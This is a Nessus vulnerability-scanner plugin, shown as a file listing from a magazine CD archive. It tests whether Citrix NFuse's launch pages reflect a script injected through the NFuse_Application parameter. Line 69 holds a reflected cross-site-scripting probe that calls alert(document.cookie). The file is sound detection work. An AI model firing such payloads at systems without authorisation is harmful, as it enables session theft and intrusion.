home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / citrix_xss.nasl < prev    next >
Encoding:
Text File  |  2005-03-31  |  2.0 KB  |  79 lines
  1. #
  2. #  This script was written by David Maciejak <david dot maciejak at kyxar dot fr>
  3. #
  4. #  based on work from
  5. #  (C) Tenable Network Security
  6. #
  7. #  Ref: Eric Detoisien <eric.detoisien@global-secure.fr>.
  8. #
  9. # This script is released under the GNU GPLv2
  10.  
  11.  
  12. if(description)
  13. {
  14.  script_id(14626);
  15.  script_bugtraq_id(4372, 9257);
  16.  script_cve_id("CAN-2002-0504");
  17.  if ( defined_func("script_xref")) script_xref(name:"OSVDB", value:"9256");
  18.  if ( defined_func("script_xref")) script_xref(name:"OSVDB", value:"9257");
  19.   
  20.  script_version("$Revision: 1.7 $");
  21.  
  22.  name["english"] = "Citrix NFuse_Application parameter XSS";
  23.  script_name(english:name["english"]);
  24.  
  25.  desc["english"] = "
  26. The remote Citrix NFuse contains a flaw that allows a remote cross site 
  27. scripting attack.
  28.  
  29. With a specially crafted request, an attacker can cause arbitrary code 
  30. execution resulting in a loss of integrity.
  31.  
  32. Risk Factor : Medium";
  33.  
  34.  script_description(english:desc["english"]);
  35.  
  36.  summary["english"] = "Test Citrix NFuse_Application parameter XSS";
  37.  script_summary(english:summary["english"]);
  38.  
  39.  script_category(ACT_GATHER_INFO);
  40.  
  41.  
  42.  script_copyright(english:"This script is Copyright (C) 2004 David Maciejak");
  43.  
  44.  family["english"] = "CGI abuses : XSS";
  45.  script_family(english:family["english"]);
  46.  script_dependencies("http_version.nasl", "cross_site_scripting.nasl");
  47.  script_require_ports("Services/www", 80);
  48.  exit(0);
  49. }
  50.  
  51. # start the test
  52.  
  53. include("http_func.inc");
  54. include("http_keepalive.inc");
  55.  
  56.  
  57. port = get_http_port(default:80);
  58. if ( ! can_host_asp(port:port) ) exit(0);
  59.  
  60. if ( get_kb_item("www/" + port + "/generic_xss") ) exit(0);
  61.  
  62.  
  63. scripts = make_list("/launch.jsp", "/launch.asp");
  64.  
  65. found =  NULL;
  66.  
  67. foreach script (scripts)
  68. {
  69.  req = http_get(item:string(script,"?NFuse_Application=>alert(document.cookie);</script>"), port:port);
  70.  r = http_keepalive_send_recv(port:port, data:req, bodyonly:1);
  71.  if( r == NULL )exit(0);
  72.  if("400 - Bad Request" >!< r && "alert(document.cookie);</script>" >< r )
  73.  {
  74.        security_hole(port);
  75.        exit(0);
  76.  }
  77. }
  78.  
  79.